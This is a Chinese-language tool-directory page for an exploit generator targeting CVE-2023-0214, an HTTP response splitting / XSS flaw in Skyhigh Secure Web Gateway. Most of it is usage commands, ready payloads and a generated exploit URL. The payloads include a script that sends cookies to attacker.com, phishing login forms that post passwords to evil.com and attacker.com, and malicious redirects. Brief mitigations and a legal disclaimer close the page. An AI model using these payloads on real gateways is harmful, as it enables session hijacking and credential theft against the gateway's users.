Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-0214 — 安全Web网关 10.2.11 - 跨站脚本(XSS) | Kitploit
工具/GitHubGitHub/0pts/cve-2023-0214
钓鱼工具漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队
GitHub0pts/cve-2023-0214

CVE-2023-0214

安全Web网关 10.2.11 - 跨站脚本(XSS)

查看仓库
26个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

SWG 漏洞利用生成器

root@kitploit:~
██████╗ ██████╗ ████████╗███████╗
██╔═████╗██╔══██╗╚══██╔══╝██╔════╝
██║██╔██║██████╔╝   ██║   ███████╗
████╔╝██║██╔═══╝    ██║   ╚════██║
╚██████╔╝██║        ██║   ███████║
 ╚═════╝ ╚═╝        ╚═╝   ╚══════╝

由 0PTS 制作

Skyhigh Secure Web Gateway(原 McAfee Web Gateway)中 HTTP Response Splitting 漏洞的概念验证。

关于漏洞

Skyhigh Secure Web Gateway 中的严重 HTTP Response Splitting 漏洞,允许通过注入任意 HTML/JavaScript 代码远程执行 XSS 攻击。

技术细节

  • 类型: HTTP Response Splitting / 跨站脚本 (XSS)
  • 危害等级: 高
  • 攻击向量: 远程,无需认证

漏洞利用原理

漏洞位于插件 "Ssos"(操作 SetLoginToken)中,该插件错误地处理 URL 参数:

  1. 参数 "p" → 注入到 P3P 标头中
  2. 参数 "c" → 注入到响应体中
  3. 参数 "v" → 注入到 cookie MwgSso 中

由于换行符(\r\n / %0d%0a)未被转义,攻击者可以:

  • 注入任意 HTTP 标头
  • 覆盖 Content-Type 和 Content-Length
  • 注入任意 HTML/JavaScript 代码

浏览器在正确构造的 Content-Length 之后会忽略响应的其余内容,从而可以完全替换显示的内容。

使用方法

基本运行

root@kitploit:~
python explot.py

带参数(如同 nmap)

root@kitploit:~
# 基本 XSS
python explot.py -d example.com -p "<script>alert(document.domain)</script>"

# 重定向
python explot.py -d target.com -p '<meta http-equiv="refresh" content="0;url=https://evil.com/">'

# 钓鱼表单
python explot.py -d bank.com -p '<form action="https://evil.com/steal"><input name="pass" placeholder="Password"><button>Login</button></form>'

# 仅输出 URL(静默模式)
python explot.py -d example.com -p "<script>alert(1)</script>" -q

参数

root@kitploit:~
-d, --domain    目标域名(默认:google.com)
-x, --prefix    URL 路径前缀(默认:SWG 内部路径)
-p, --payload   HTML/JavaScript 载荷
-q, --quiet     静默模式 - 仅输出 URL
-v, --version   脚本版本
-h, --help      帮助信息

载荷示例

带 Cookie 窃取的 XSS

root@kitploit:~
<script>fetch('https://attacker.com/log?c='+document.cookie)</script>

钓鱼表单

root@kitploit:~
<html>
<body style="font-family:Arial">
<h2>会话已过期 - 请重新登录</h2>
<form action="https://attacker.com/phish" method="POST">
<input type="text" name="user" placeholder="用户名"><br>
<input type="password" name="pass" placeholder="密码"><br>
<button>登录</button>
</form>
</body>
</html>

重定向至恶意网站

root@kitploit:~
<meta http-equiv="refresh" content="0;url=https://malicious-site.com/">

演示

root@kitploit:~
██████╗ ██████╗ ████████╗███████╗
██╔═████╗██╔══██╗╚══██╔══╝██╔════╝
██║██╔██║██████╔╝   ██║   ███████╗
████╔╝██║██╔═══╝    ██║   ╚════██║
╚██████╔╝██║        ██║   ███████║
 ╚═════╝ ╚═╝        ╚═╝   ╚══════╝

[+] 目标域名:   example.com
[+] 载荷长度:  43 字节
[+] URL 长度:      234 字符

[+] 生成的 URL:

http://example.com/mwg-internal/de5fs23hu73ds/plugin?target=Ssos&action=SetLoginToken&v=1&c=1&p=p%0D%0AContent-Type%3A%20text%2Fhtml%3Bcharset%3Dutf-8%0D%0AContent-Length%3A%2043%0D%0A%0D%0A%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

防护措施

  1. 将 Skyhigh SWG 更新至最新版本
  2. 使用具备 CRLF 注入过滤功能的 WAF
  3. 监控针对 /mwg-internal/* 的异常请求

免责声明

⚠️ 注意: 此工具仅用于:

  • 授权渗透测试
  • 教育目的
  • CTF 竞赛
  • 安全研究

未经所有者明确许可而针对系统使用该工具是违法行为。

来源

  • https://www.exploit-db.com/exploits/51237
  • Skyhigh Security 公告

root@kitploit:~
██████╗ ██████╗ ████████╗███████╗
██╔═████╗██╔══██╗╚══██╔══╝██╔════╝
██║██╔██║██████╔╝   ██║   ███████╗
████╔╝██║██╔═══╝    ██║   ╚════██║
╚██████╔╝██║        ██║   ███████║
 ╚═════╝ ╚═╝        ╚═╝   ╚══════╝
下载工具